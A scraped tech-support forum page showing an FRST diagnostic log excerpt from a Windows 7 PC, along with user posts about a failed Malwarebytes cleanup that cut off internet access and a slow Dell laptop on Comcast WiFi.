Windows Update 27-11-2015 19:04:56 Windows Update 01-12-2015 12:15:00 Windows Update 04-12-2015 15:03:04 Windows Update 11-12-2015 12:52:52 Windows Update 14-12-2015 12:24:39 Windows Update 17-12-2015 18:42:37 Windows Update 26-12-2015 11:41:26 Windows Update 29-12-2015 21:04:35 Windows Update 03-01-2016 21:07:54 Windows Update 08-01-2016 18:16:31 Windows Update 16-01-2016 08:03:26 Windows Update 17-01-2016 11:42:08 Windows Update 21-01-2016 12:58:31 Windows Update 23-01-2016 18:29:26 Removed Ask Toolbar. 23-01-2016 18:35:35 Removed SlimCleaner Plus ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (01/26/2016 02:58:19 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/24/2016 02:45:42 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/24/2016 02:39:15 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/23/2016 07:44:06 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 07:41:05 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 07:37:59 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/23/2016 07:36:49 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 06:31:13 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 06:28:04 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 06:24:43 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 System errors: ============= Error: (01/24/2016 03:48:50 AM) (Source: ssidrv) (EventID: 26) (User: ) Description: Failed to set monitor event rule. Error: (01/24/2016 03:47:30 AM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: 30000Netman Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 115.31.0.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY59 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\SYSTEM Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/24/2016 02:37:27 AM) (Source: ssidrv) (EventID: 26) (User: ) Description: Failed to set monitor event rule. Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 115.31.0.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 CodeIntegrity: =================================== Date: 2016-01-26 03:07:09.097 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:08.847 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:08.629 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:08.395 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:08.005 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:07.771 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:07.521 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:07.287 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:06:33.544 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:06:33.326 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core2 Duo CPU P7350 @ 2.00GHz Percentage of memory in use: 39% Total physical RAM: 4093.04 MB Available physical RAM: 2493.93 MB Total Virtual: 8361.36 MB Available Virtual: 6564.87 MB ==================== Drives ================================ Drive c: (TI100343V0F) (Fixed) (Total:454.05 GB) (Free:335.04 GB) NTFS ==>[drive with boot components (obtained from BCD)] Drive e: (FCCJ TROY) (Removable) (Total:0.99 GB) (Free:0.98 GB) FAT ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 008CB0AA) Partition 1: (Not Active) - (Size=1.5 GB) - (Type=27) Partition 2: (Active) - (Size=454.1 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=10.2 GB) - (Type=17) ======================================================== Disk: 1 (Size: 1010 MB) (Disk ID: 00661E17) Partition 1: (Active) - (Size=1010 MB) - (Type=06) ==================== End of Addition.txt ============================

Sorry, forgot to mention, its a toshiba satelite a505, windows 7, running webroot antivirus

A elderly family member's PC was miserably slow, showing obvious signs of infection, programs such as ArcadeTwist, PremierOpinion, Slimware/Slimcleaner, OneSystemCare, among others. I downloaded, installed, and did a threatscan with the free version of malwarebytes. It found over 2300 items, i attempted to quarantine them all, then something odd happened. Malwarebytes said "0 items successfully quarantined" and the finish button froze. So i restarted the pc, and now it shows all the the items (i assume, i didnt count) in the quarantine, however the scan log from that scan shows nothing, zeros in every catagory. Now after that reboot, the PC cannot access the internet, despite showing a network connection, webpages cannot be accessed, neither thru Firefox or IE, MalwareBytes cant access servers to update, trying to "ping" google.com in command prompt doesnt work. needless to say, i cant download any other scan tools. All help is appreciated, thank you.

Yes, as i said in the original post, i never assumed it was an issue of Comcast not delivering what i paid for. And i understand Wifi will naturally be slower than Ethernet. But i don't understand why the notebook is the only device in the house that has such issues with internet speed. All the other devices are reasonably fast on the same WiFi, but the dell notebook is practically unusable. I was hoping maybe there was something internally with the notebook, like some settings that needed to be adjusted, or something needed to be changed in the registry, etc. that i could do to make it a little faster Is it actually normal for a 2.7gb file to take 14 hours to download?

Ok, i followed your instructions, here are the results: Ping: 35ms download: 89.32 Mbps upload: 4.37 Mbps

Yes, all correct. It's windows 7, 64 bit, and that's exactly what the Wifi router, and the cable converter things look like.

Sorry, the laptop itself just says "Inspiron", control panel says the model is N5110. It connects over WiFi, there are three TVs in the house, with cable modems (the front of the modem says "uDTA-p", and the model number says "DC50Xu". Im not sure what the WiFi router is called other than "Xfinity 802.11n XB2") None of the TVs actually connect to the internet. At most, the wifi has one LG cell phone, a samsung galaxy tablet, a Microsoft surface pro 4, a Nintendo Wii, and the PC; connected at any one time, and btw i have tried disconnecting all other devices from the WiFi, it doesn't help the slow connection on the PC at all. The 3 logs should be attached. Thank you. Addition.txt CheckResults.txt FRST.txt

Hello, I was hoping the kind, brilliant people of this forum could help me with my pc's slow internet connection. I pay for 75 Mbps from my ISP (comcast), however a speed test from their own website gives me the results: IPv4: ping = 11ms, Download = 36.39mbps, upload = 11.79 Mbps Ipv6: ping = 12ms, Download = 44.68 Mbps, upload = 2.78 Mbps Also, watching/streaming videos is very frustrating and laggy, webpages take several minutes to load, and games that run without problems on singleplayer are unplayable online. Im pretty sure the issue is with my PC, not the ISP or the router, since other devices dont seem so slow. I dont really think its a malware issue, but i can never say for sure. Its a 3-4 year old Dell inspiron laptop, i run Trend micro titanium antivirus and malwarebytes home premium. Any help is much appreciated, thanks.